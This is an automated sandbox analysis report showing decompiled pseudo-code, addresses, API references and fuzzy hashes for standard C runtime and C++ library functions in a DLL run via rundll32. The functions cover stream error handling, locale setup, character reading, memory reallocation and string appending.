__flush.LIBCMT ref: 1000B4BA
__write.LIBCMT ref: 1000B4ED
__flsbuf.LIBCMT ref: 1000B51B

Part of subcall function 1000BE7A: __getptd_noexit.LIBCMT ref: 1000BE7A

Strings

h, xrefs: 1000B555

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID: h
API String ID: 2782032738-2123013650
Opcode ID: 513dcd674fb9cd2fed2d4cb62315706bffa81b7adceda0573035ea812ac9f805
Instruction ID: b8b17f5cdaa819700a076e409099fc7790be5039f94c18aee1622183f9711c40
Opcode Fuzzy Hash: 513dcd674fb9cd2fed2d4cb62315706bffa81b7adceda0573035ea812ac9f805
Instruction Fuzzy Hash: E241B371A00F069BEB18CFA9C8906AE77E5EF447E1B20857DE90587259DB70DF818B40

Uniqueness

Uniqueness Score: -1.00%

Function 10002B20, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E10002B20(void* __ebx, signed int* __ecx) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				signed int* _v24;
				char _v44;
				signed int _t46;
				intOrPtr _t55;
				signed int _t56;
				signed int _t57;
				intOrPtr* _t58;
				signed int _t68;
				signed int _t69;
				intOrPtr* _t79;
				intOrPtr _t82;
				intOrPtr* _t83;
				intOrPtr _t86;
				void* _t87;
				signed char _t89;
				char* _t90;
				intOrPtr _t91;
				signed int* _t93;
				signed int _t95;

				_t77 = __ebx;
				_push(0xffffffff);
				_push(E1001BE10);
				_push( *[fs:0x0]);
				_t46 =  *0x10026250; // 0x93b758c1
				_push(_t46 ^ _t95);
				 *[fs:0x0] =  &_v16;
				_t93 = __ecx;
				_t79 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx)) + 4)) + __ecx + 0x38));
				if(_t79 == 0) {
					L20:
					 *[fs:0x0] = _v16;
					return _t93;
				}
				_v24 = __ecx;
				 *((intOrPtr*)( *_t79 + 4))();
				_v8 = 0;
				_t55 =  *((intOrPtr*)( *((intOrPtr*)(__ecx)) + 4));
				if( *((intOrPtr*)(_t55 + __ecx + 0xc)) == 0) {
					_t91 =  *((intOrPtr*)(_t55 + __ecx + 0x3c));
					if(_t91 != 0 && _t91 != __ecx) {
						E10002B20(__ebx, _t91);
					}
				}
				_t56 =  *_t93;
				_t82 =  *((intOrPtr*)(_t56 + 4));
				_t57 = _t56 & 0xffffff00 |  *((intOrPtr*)(_t82 +  &(_t93[3]))) == 0x00000000;
				_v20 = _t57;
				_v8 = 1;
				if(_t57 == 0 ||  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t82 +  &(_t93[0xe]))))) + 0x34))() != 0xffffffff) {
					L16:
					_v8 = 0xffffffff;
					_t58 = L10006007(__eflags);
					__eflags = _t58;
					if(_t58 == 0) {
						E10002650(_t93);
					}
					_t83 =  *((intOrPtr*)( *((intOrPtr*)( *_t93 + 4)) +  &(_t93[0xe])));
					__eflags = _t83;
					if(_t83 != 0) {
						 *((intOrPtr*)( *_t83 + 8))();
					}
					goto L20;
				} else {
					_t86 =  *((intOrPtr*)( *_t93 + 4));
					_t87 = _t86 + _t93;
					_t68 =  *(_t86 +  &(_t93[3])) | 0x00000004;
					if( *((intOrPtr*)(_t87 + 0x38)) == 0) {
						_t68 = _t68 | 0x00000004;
					}
					_t69 = _t68 & 0x00000017;
					 *(_t87 + 0xc) = _t69;
					_t89 =  *(_t87 + 0x10) & _t69;
					if(_t89 == 0) {
						goto L16;
					} else {
						if((_t89 & 0x00000004) != 0) {
							_t89 =  &_v44;
							E100020F0(_t77, _t89, 1, 0x10026008, "ios_base::badbit set");
							_v44 = 0x1001d34c;
							E10007F53( &_v44, 0x100245ac);
						}
						_t90 =  &_v44;
						if((_t89 & 0x00000002) == 0) {
							L15:
							_push("ios_base::eofbit set");
							goto L14;
						} else {
							_push("ios_base::failbit set");
							L14:
							_push(0x10026008);
							_push(1);
							E100020F0(_t77, _t90);
							_v44 = 0x1001d34c;
							E10007F53( &_v44, 0x100245ac);
							goto L15;
						}
					}
				}
			}

0x10002b20
0x10002b23
0x10002b25
0x10002b30
0x10002b35
0x10002b3c
0x10002b40
0x10002b46
0x10002b4d
0x10002b53
0x10002c66
0x10002c6b
0x10002c77
0x10002c77
0x10002b5b
0x10002b5e
0x10002b63
0x10002b6a
0x10002b72
0x10002b74
0x10002b7a
0x10002b80
0x10002b80
0x10002b7a
0x10002b85
0x10002b87
0x10002b8f
0x10002b92
0x10002b95
0x10002b9e
0x10002c3d
0x10002c3d
0x10002c44
0x10002c49
0x10002c4b
0x10002c4f
0x10002c4f
0x10002c59
0x10002c5d
0x10002c5f
0x10002c63
0x10002c63
0x00000000
0x10002bb6
0x10002bb8
0x10002bbf
0x10002bc1
0x10002bc8
0x10002bca
0x10002bca
0x10002bcd
0x10002bd0
0x10002bd6
0x10002bd8
0x00000000
0x10002bda
0x10002bdd
0x10002beb
0x10002bee
0x10002bfb
0x10002c03
0x10002c03
0x10002c0b
0x10002c0e
0x10002c36
0x10002c36
0x00000000
0x10002c10
0x10002c10
0x10002c15
0x10002c15
0x10002c1a
0x10002c1c
0x10002c29
0x10002c31
0x00000000
0x10002c31
0x10002c0e
0x10002bd8

APIs

__CxxThrowException@8.LIBCMT ref: 10002C03
__CxxThrowException@8.LIBCMT ref: 10002C31

Strings

ios_base::failbit set, xrefs: 10002C10
ios_base::badbit set, xrefs: 10002BDF
ios_base::eofbit set, xrefs: 10002C36

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: ffbc5e68c9e5dfc22ee624d8b1cb7eb7e9dffad5d45c619147c7a2f4084554f3
Instruction ID: 40f2a591c403c227ffd1b55de1e9fe865b83217f1bd764759fcbde04836622d5
Opcode Fuzzy Hash: ffbc5e68c9e5dfc22ee624d8b1cb7eb7e9dffad5d45c619147c7a2f4084554f3
Instruction Fuzzy Hash: CC41CB386006049FEB14DF58C980F9C7BF4FF083A8FA5815DE516AB692CB35EA45CB40

Uniqueness

Uniqueness Score: -1.00%

Function 10001EB0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 84%

			E10001EB0(intOrPtr __ecx, char* _a4) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				char _v32;
				void* __esi;
				signed int _t25;
				char* _t30;
				void* _t36;
				void* _t41;
				void* _t42;
				intOrPtr _t44;
				signed int _t46;

				_push(0xffffffff);
				_push(E1001BD1A);
				_push( *[fs:0x0]);
				_t25 =  *0x10026250; // 0x93b758c1
				_push(_t25 ^ _t46);
				 *[fs:0x0] =  &_v16;
				_t44 = __ecx;
				_v20 = __ecx;
				E10005F88(__ecx, 0);
				_v8 = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((char*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				 *((char*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				 *((short*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((short*)(__ecx + 0x20)) = 0;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				 *((char*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				 *((char*)(__ecx + 0x30)) = 0;
				_t30 = _a4;
				_v8 = 6;
				_t50 = _t30;
				if(_t30 == 0) {
					_a4 = "bad locale name";
					E10008BD4( &_v32,  &_a4);
					_v32 = 0x1001d2d0;
					_t30 = E10007F53( &_v32, 0x10024558);
				}
				E1000648D(_t36, _t41, _t42, _t44, _t50, _t44, _t30);
				 *[fs:0x0] = _v16;
				return _t44;
			}

0x10001eb3
0x10001eb5
0x10001ec0
0x10001ec5
0x10001ecc
0x10001ed0
0x10001ed6
0x10001ed8
0x10001edd
0x10001ee2
0x10001ee9
0x10001ef0
0x10001ef4
0x10001efb
0x10001f01
0x10001f08
0x10001f0c
0x10001f0f
0x10001f13
0x10001f16
0x10001f19
0x10001f1c
0x10001f1f
0x10001f22
0x10001f26
0x10001f28
0x10001f2d
0x10001f38
0x10001f45
0x10001f4d
0x10001f4d
0x10001f54
0x10001f61
0x10001f6d

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 10001EDD

Part of subcall function 10005F88: __lock.LIBCMT ref: 10005F99

std::exception::exception.LIBCMT ref: 10001F38

Part of subcall function 10008BD4: std::exception::_Copy_str.LIBCMT ref: 10008BED

__CxxThrowException@8.LIBCMT ref: 10001F4D

Part of subcall function 10007F53: RaiseException.KERNEL32(?,?,10005ED7,10003239,10003239,?,?,?,?,?,10005ED7,10003239,100246B4,?), ref: 10007FA8

std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 10001F54

Strings

bad locale name, xrefs: 10001F2D

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: std::_$Copy_strExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrow__lockstd::exception::_std::exception::exception
String ID: bad locale name
API String ID: 271752322-1405518554
Opcode ID: 2acd0cf59d7d4d17296cfe6c33049850ea5d45d959bd36a1359fbea84aaaf7aa
Instruction ID: 3ed44198cc18973a2ff0d0863cad21efce0bc7711b2537136f26fd99946c78b8
Opcode Fuzzy Hash: 2acd0cf59d7d4d17296cfe6c33049850ea5d45d959bd36a1359fbea84aaaf7aa
Instruction Fuzzy Hash: 12216071804B849FD720CF68C840B9BBBF8EF19354F408A6EE45AD7B41E779A604CB95

Uniqueness

Uniqueness Score: -1.00%

Function 100071E5, Relevance: 7.6, APIs: 5, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E100071E5(void* __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				void* _t62;
				signed int** _t72;
				intOrPtr _t77;
				signed int** _t81;
				intOrPtr _t83;
				intOrPtr _t95;
				intOrPtr _t103;
				void* _t111;
				signed int _t112;
				intOrPtr _t113;
				signed int** _t115;
				void* _t116;

				_t112 = __esi;
				_push(0x2c);
				E100090B1(E1001BFB7, __ebx, __edi, __esi);
				_t111 = __ecx;
				_t60 =  *((intOrPtr*)(__ecx + 0x1c));
				_t95 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c))));
				if(_t95 == 0) {
					L3:
					_t93 = 0;
					__eflags =  *(_t111 + 0x50);
					if( *(_t111 + 0x50) != 0) {
						E10006B6C(_t111);
						__eflags =  *(_t111 + 0x40);
						if(__eflags != 0) {
							 *((intOrPtr*)(_t116 - 0x14)) = 0xf;
							 *((intOrPtr*)(_t116 - 0x18)) = 0;
							 *((char*)(_t116 - 0x28)) = 0;
							_push( *(_t111 + 0x50));
							 *((intOrPtr*)(_t116 - 4)) = 0;
							_t62 = E1000B045(0, _t111, _t112, __eflags);
							_t112 = _t112 | 0xffffffff;
							while(1) {
								__eflags = _t62 - _t112;
								if(_t62 == _t112) {
									break;
								}
								_push(_t62);
								E10006BD5(_t62, _t116 - 0x28, _t108, _t112, 1);
								__eflags =  *((intOrPtr*)(_t116 - 0x14)) - 0x10;
								_t93 =  *((intOrPtr*)(_t116 - 0x28));
								if( *((intOrPtr*)(_t116 - 0x14)) < 0x10) {
									 *((intOrPtr*)(_t116 - 0x34)) = _t116 - 0x28;
								} else {
									 *((intOrPtr*)(_t116 - 0x34)) = _t93;
								}
								__eflags =  *((intOrPtr*)(_t116 - 0x14)) - 0x10;
								if( *((intOrPtr*)(_t116 - 0x14)) < 0x10) {
									_t93 = _t116 - 0x28;
								}
								_t108 =  *( *(_t111 + 0x40));
								_t72 = ( *( *(_t111 + 0x40)))[6](_t111 + 0x48, _t93,  *((intOrPtr*)(_t116 - 0x18)) +  *((intOrPtr*)(_t116 - 0x34)), _t116 - 0x30, _t116 - 0x29, _t116 - 0x28, _t116 - 0x38);
								__eflags = _t72;
								if(_t72 < 0) {
									L22:
									E10001390(_t116 - 0x28, 1, 0);
									L23:
									return E1000906F(_t93, _t111, _t112);
								} else {
									__eflags = _t72 - 1;
									if(_t72 <= 1) {
										__eflags =  *((intOrPtr*)(_t116 - 0x38)) - _t116 - 0x29;
										if( *((intOrPtr*)(_t116 - 0x38)) != _t116 - 0x29) {
											__eflags =  *((intOrPtr*)(_t116 - 0x14)) - 0x10;
											_t113 =  *((intOrPtr*)(_t116 - 0x28));
											if( *((intOrPtr*)(_t116 - 0x14)) < 0x10) {
												_t113 = _t116 - 0x28;
											}
											_t77 =  *((intOrPtr*)(_t116 - 0x30));
											_t115 = _t113 - _t77 +  *((intOrPtr*)(_t116 - 0x18));
											__eflags = _t115;
											if(__eflags <= 0) {
												L21:
												_t112 =  *(_t116 - 0x29) & 0x000000ff;
												goto L22;
											} else {
												goto L34;
											}
											while(1) {
												L34:
												_push( *(_t111 + 0x50));
												_t115 = _t115 - 1;
												_push( *((char*)(_t115 + _t77)));
												E1000B7C5(_t93, _t111, _t115, __eflags);
												__eflags = _t115;
												if(__eflags <= 0) {
													goto L21;
												}
												_t77 =  *((intOrPtr*)(_t116 - 0x30));
											}
											goto L21;
										}
										__eflags =  *((intOrPtr*)(_t116 - 0x14)) - 0x10;
										_t103 =  *((intOrPtr*)(_t116 - 0x28));
										if( *((intOrPtr*)(_t116 - 0x14)) < 0x10) {
											_t103 = _t116 - 0x28;
										}
										_t81 =  *((intOrPtr*)(_t116 - 0x30)) - _t103;
										__eflags = _t81;
										_push(_t81);
										E10001700(_t93, _t116 - 0x28, 0);
										L28:
										_push( *(_t111 + 0x50));
										_t62 = E1000B045(_t93, _t111, _t112, __eflags);
										continue;
									}
									__eflags = _t72 - 3;
									if(_t72 != 3) {
										goto L22;
									}
									__eflags =  *((intOrPtr*)(_t116 - 0x18)) - 1;
									if(__eflags < 0) {
										goto L28;
									}
									__eflags =  *((intOrPtr*)(_t116 - 0x14)) - 0x10;
									_t83 =  *((intOrPtr*)(_t116 - 0x28));
									if( *((intOrPtr*)(_t116 - 0x14)) < 0x10) {
										_t83 = _t116 - 0x28;
									}
									E1000B835(_t116 - 0x29, 1, _t83, 1);
									goto L21;
								}
							}
							goto L22;
						}
						 *((char*)(_t116 - 0x2a)) = 0;
						_t60 = E1000658C(__eflags, _t116 - 0x2a,  *(_t111 + 0x50));
						__eflags = _t60;
						if(_t60 == 0) {
							goto L4;
						}
						goto L23;
					}
					L4:
					goto L23;
				}
				_t108 =  *(__ecx + 0x2c);
				_t112 =  *_t108;
				_t60 = _t112 + _t95;
				if(_t95 >= _t112 + _t95) {
					goto L3;
				}
				 *_t108 = _t112 - 1;
				 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c)))) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c)))) + 1;
				goto L23;
			}

0x100071e5
0x100071e5
0x100071ec
0x100071f1
0x100071f3
0x100071f6
0x100071fa
0x1000721f
0x1000721f
0x10007221
0x10007224
0x10007230
0x10007235
0x10007238
0x10007258
0x1000725f
0x10007262
0x10007265
0x10007268
0x1000726b
0x10007270
0x10007339
0x1000733a
0x1000733c
0x00000000
0x00000000
0x10007278
0x1000727e
0x10007283
0x10007287
0x1000728a
0x10007294
0x1000728c
0x1000728c
0x1000728c
0x10007297
0x1000729b
0x1000729d
0x1000729d
0x100072ab
0x100072c1
0x100072c4
0x100072c6
0x100072f9
0x10007300
0x10007307
0x1000730c
0x100072c8
0x100072c8
0x100072cb
0x10007310
0x10007313
0x10007344
0x10007348
0x1000734b
0x1000734d
0x1000734d
0x10007350
0x10007355
0x10007358
0x1000735a
0x100072f5
0x100072f5
0x00000000
0x00000000
0x00000000
0x00000000
0x1000735c
0x1000735c
0x1000735c
0x1000735f
0x10007364
0x10007365
0x1000736c
0x1000736e
0x00000000
0x00000000
0x10007370
0x10007370
0x00000000
0x1000735c
0x10007315
0x10007319
0x1000731c
0x1000731e
0x1000731e
0x10007324
0x10007324
0x10007329
0x1000732c
0x10007331
0x10007331
0x10007334
0x00000000
0x10007334
0x100072cd
0x100072d0
0x00000000
0x00000000
0x100072d2
0x100072d6
0x00000000
0x00000000
0x100072d8
0x100072dc
0x100072df
0x100072e1
0x100072e1
0x100072ed
0x00000000
0x100072f2
0x100072c6
0x00000000
0x10007342
0x10007240
0x10007244
0x1000724b
0x1000724d
0x00000000
0x00000000
0x00000000
0x1000724f
0x10007226
0x00000000
0x10007226
0x100071fc
0x100071ff
0x10007201
0x10007206
0x00000000
0x00000000
0x1000720b
0x10007215
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 100071EC
_fgetc.LIBCMT ref: 10007334
_ungetc.LIBCMT ref: 10007365

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: H_prolog3__fgetc_ungetc
String ID:
API String ID: 1616942180-0
Opcode ID: 39c11b69b1c5a91d5b4697093423ada524446ebddb03204b3bc1a1fb3ee8277b
Instruction ID: 5a9e2dcfa74e91a620e6fcaf88a6683b2260356cbbd02131dac3c8332b9c5e76
Opcode Fuzzy Hash: 39c11b69b1c5a91d5b4697093423ada524446ebddb03204b3bc1a1fb3ee8277b
Instruction Fuzzy Hash: BC514A75E0061A9FEF15CEA4C891ADDBBB5FF08394F140529E905B7289D735BA80CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10012AEC, Relevance: 7.6, APIs: 5, Instructions: 67
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E10012AEC(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0x10028244, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0x10028878 - _t7;
								if(__eflags == 0) {
									_t9 = E1000BE7A(__eflags);
									 *_t9 = E1000BE8D(GetLastError());
									goto L17;
								} else {
									__eflags = E1000DF30(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E1000BE7A(__eflags);
										 *_t12 = E1000BE8D(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E1000DF30(_t6, _t31);
						 *((intOrPtr*)(E1000BE7A(__eflags))) = 0xc;
						goto L12;
					} else {
						E10008AD3(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E10008B0B(__ebx, __edx, __edi, _a8);
				}
			}

0x10012af3
0x10012b01
0x10012b04
0x10012b06
0x10012b15
0x10012b48
0x10012b48
0x10012b4b
0x00000000
0x00000000
0x10012b18
0x10012b1a
0x10012b1c
0x10012b1c
0x10012b1c
0x10012b29
0x10012b2f
0x10012b31
0x10012b33
0x10012b93
0x10012b93
0x10012b35
0x10012b35
0x10012b3b
0x10012b7d
0x10012b91
0x00000000
0x10012b3d
0x10012b44
0x10012b46
0x10012b65
0x10012b79
0x10012b5f
0x10012b5f
0x10012b5f
0x00000000
0x00000000
0x00000000
0x10012b46
0x10012b3b
0x00000000
0x10012b61
0x10012b4e
0x10012b59
0x00000000
0x10012b08
0x10012b0b
0x10012b11
0x10012b11
0x10012b62
0x10012b64
0x10012af5
0x10012aff
0x10012aff

APIs

_malloc.LIBCMT ref: 10012AF8

Part of subcall function 10008B0B: __FF_MSGBANNER.LIBCMT ref: 10008B22
Part of subcall function 10008B0B: __NMSG_WRITE.LIBCMT ref: 10008B29
Part of subcall function 10008B0B: HeapAlloc.KERNEL32(008B0000,00000000,00000001,00000001,10003239,10003239,?,10008CB8,00000001,00000000,10003239,?,?,10008BF2,10005EC2,?), ref: 10008B4E

_free.LIBCMT ref: 10012B0B

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: AllocHeap_free_malloc
String ID:
API String ID: 2734353464-0
Opcode ID: 95dbe031a9d3c77cf64f8bc89395b1e9d780c93c2c2cfd0698273f9e2f2ab7e9
Instruction ID: 741de6de0f46ba21441ec8418c4fbe79f80ad01b60b4091a6ae20a414c148a7a
Opcode Fuzzy Hash: 95dbe031a9d3c77cf64f8bc89395b1e9d780c93c2c2cfd0698273f9e2f2ab7e9
Instruction Fuzzy Hash: 7E11E7B6508622AAEB11EF70EC85B4E37D8EB043E0B218436F9048E151DF30D9A18794

Uniqueness

Uniqueness Score: -1.00%

Function 10002780, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 202
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 38%

			E10002780(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr* _v0;
				signed int _v20;
				intOrPtr _t34;
				signed int _t36;
				signed int _t40;
				signed int _t41;
				signed int _t46;
				signed int _t58;
				void* _t72;
				signed int _t73;
				signed int _t80;
				intOrPtr* _t81;
				signed int _t82;
				signed int _t84;
				intOrPtr _t86;
				intOrPtr _t87;
				intOrPtr* _t91;
				intOrPtr _t93;
				signed int _t94;
				intOrPtr* _t96;
				signed int _t97;
				intOrPtr* _t107;
				signed int _t108;
				void* _t116;
				void* _t124;

				_t72 = __ebx;
				_t116 = _t124;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t96 = _a4;
				_t107 = __ecx;
				_t80 = _a8;
				_t34 =  *((intOrPtr*)(_t96 + 0x10));
				if(_t34 < _t80) {
					_push("invalid string position");
					E10005ED8(__eflags);
					goto L16;
				} else {
					_t58 = _t34 - _t80;
					_t80 =  *(__ecx + 0x10);
					_a4 = _t80;
					_t72 =  <  ? _t58 : _a12;
					if((_t58 | 0xffffffff) - _t80 <= _t72) {
						L16:
						_push("string too long");
						_t36 = E10005EAA(__eflags);
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(_t116);
						_push(_t107);
						_push(_t96);
						_t97 = _v20;
						_t108 = _t80;
						__eflags = _t97;
						if(_t97 == 0) {
							L29:
							_t81 =  *((intOrPtr*)(_t108 + 0x10));
							_push(_t72);
							_t73 = _a4;
							_v0 = _t81;
							__eflags = (_t36 | 0xffffffff) - _t81 - _t73;
							if(__eflags <= 0) {
								_push("string too long");
								E10005EAA(__eflags);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_t40 =  *_t81;
								__eflags = _t40;
								if(_t40 != 0) {
									_t82 =  *((intOrPtr*)(_t40 + 0x18));
									__eflags = _t82;
									if(_t82 == 0) {
										_t41 = _t40 + 0x1c;
										__eflags = _t41;
										return _t41;
									} else {
										return _t82;
									}
								} else {
									return 0x1001d2f8;
								}
							} else {
								__eflags = _t73;
								if(_t73 == 0) {
									L40:
									return _t108;
								} else {
									_push(0);
									_t46 = E100012D0(_t108, _t81 + _t73);
									__eflags = _t46;
									if(_t46 == 0) {
										goto L40;
									} else {
										__eflags =  *((intOrPtr*)(_t108 + 0x14)) - 0x10;
										if( *((intOrPtr*)(_t108 + 0x14)) < 0x10) {
											_t84 = _t108;
										} else {
											_t84 =  *_t108;
										}
										__eflags = _t73;
										if(_t73 != 0) {
											__eflags =  *((intOrPtr*)(_t108 + 0x10)) + _t84;
											E100083B0( *((intOrPtr*)(_t108 + 0x10)) + _t84, _t97, _t73);
										}
										_t86 = _v0 + _t73;
										__eflags =  *((intOrPtr*)(_t108 + 0x14)) - 0x10;
										 *((intOrPtr*)(_t108 + 0x10)) = _t86;
										if( *((intOrPtr*)(_t108 + 0x14)) < 0x10) {
											 *((char*)(_t108 + _t86)) = 0;
											goto L40;
										} else {
											 *((char*)( *_t108 + _t86)) = 0;
											return _t108;
										}
									}
								}
							}
						} else {
							_t87 =  *((intOrPtr*)(_t108 + 0x14));
							__eflags = _t87 - 0x10;
							if(_t87 < 0x10) {
								_t36 = _t108;
							} else {
								_t36 =  *_t108;
							}
							__eflags = _t97 - _t36;
							if(_t97 < _t36) {
								goto L29;
							} else {
								__eflags = _t87 - 0x10;
								if(_t87 < 0x10) {
									_t94 = _t108;
								} else {
									_t94 =  *_t108;
								}
								_t36 =  *((intOrPtr*)(_t108 + 0x10)) + _t94;
								__eflags = _t36 - _t97;
								if(_t36 <= _t97) {
									goto L29;
								} else {
									__eflags = _t87 - 0x10;
									if(_t87 < 0x10) {
										_push(_a4);
										__eflags = _t97 - _t108;
										return E10002780(_t72, _t108, _t97 - _t108, _t108, _t108, _t97 - _t108);
									} else {
										_push(_a4);
										__eflags = _t97 -  *_t108;
										return E10002780(_t72, _t108, _t97 -  *_t108, _t108, _t108, _t97 -  *_t108);
									}
								}
							}
						}
					} else {
						if(_t72 == 0) {
							L14:
							return _t107;
						} else {
							_push(0);
							if(E100012D0(__ecx, _t80 + _t72) == 0) {
								goto L14;
							} else {
								if( *((intOrPtr*)(_t96 + 0x14)) >= 0x10) {
									_t96 =  *_t96;
								}
								if( *((intOrPtr*)(_t107 + 0x14)) < 0x10) {
									_t91 = _t107;
								} else {
									_t91 =  *_t107;
								}
								if(_t72 != 0) {
									E100083B0( *((intOrPtr*)(_t107 + 0x10)) + _t91, _a8 + _t96, _t72);
								}
								_t93 = _a4 + _t72;
								 *((intOrPtr*)(_t107 + 0x10)) = _t93;
								if( *((intOrPtr*)(_t107 + 0x14)) < 0x10) {
									 *((char*)(_t107 + _t93)) = 0;
									goto L14;
								} else {
									 *((char*)( *_t107 + _t93)) = 0;
									return _t107;
								}
							}
						}
					}
				}
			}

0x10002780
0x10002781
0x10002783
0x10002784
0x10002785
0x10002786
0x10002789
0x1000278b
0x1000278e
0x10002793
0x10002820
0x10002825
0x00000000
0x10002799
0x1000279c
0x1000279e
0x100027a3
0x100027a6
0x100027b0
0x1000282a
0x1000282a
0x1000282f
0x10002834
0x10002835
0x10002836
0x10002837
0x10002838
0x10002839
0x1000283a
0x1000283b
0x1000283c
0x1000283d
0x1000283e
0x1000283f
0x10002840
0x10002843
0x10002844
0x10002845
0x10002848
0x1000284a
0x1000284c
0x100028a5
0x100028a5
0x100028ab
0x100028ac
0x100028b1
0x100028b4
0x100028b6
0x10002919
0x1000291e
0x10002923
0x10002924
0x10002925
0x10002926
0x10002927
0x10002928
0x10002929
0x1000292a
0x1000292b
0x1000292c
0x1000292d
0x1000292e
0x1000292f
0x10002930
0x10002932
0x10002934
0x1000293c
0x1000293f
0x10002941
0x10002946
0x10002946
0x10002949
0x10002943
0x10002945
0x10002945
0x10002936
0x1000293b
0x1000293b
0x100028b8
0x100028b8
0x100028ba
0x10002910
0x10002916
0x100028bc
0x100028c1
0x100028c4
0x100028c9
0x100028cb
0x00000000
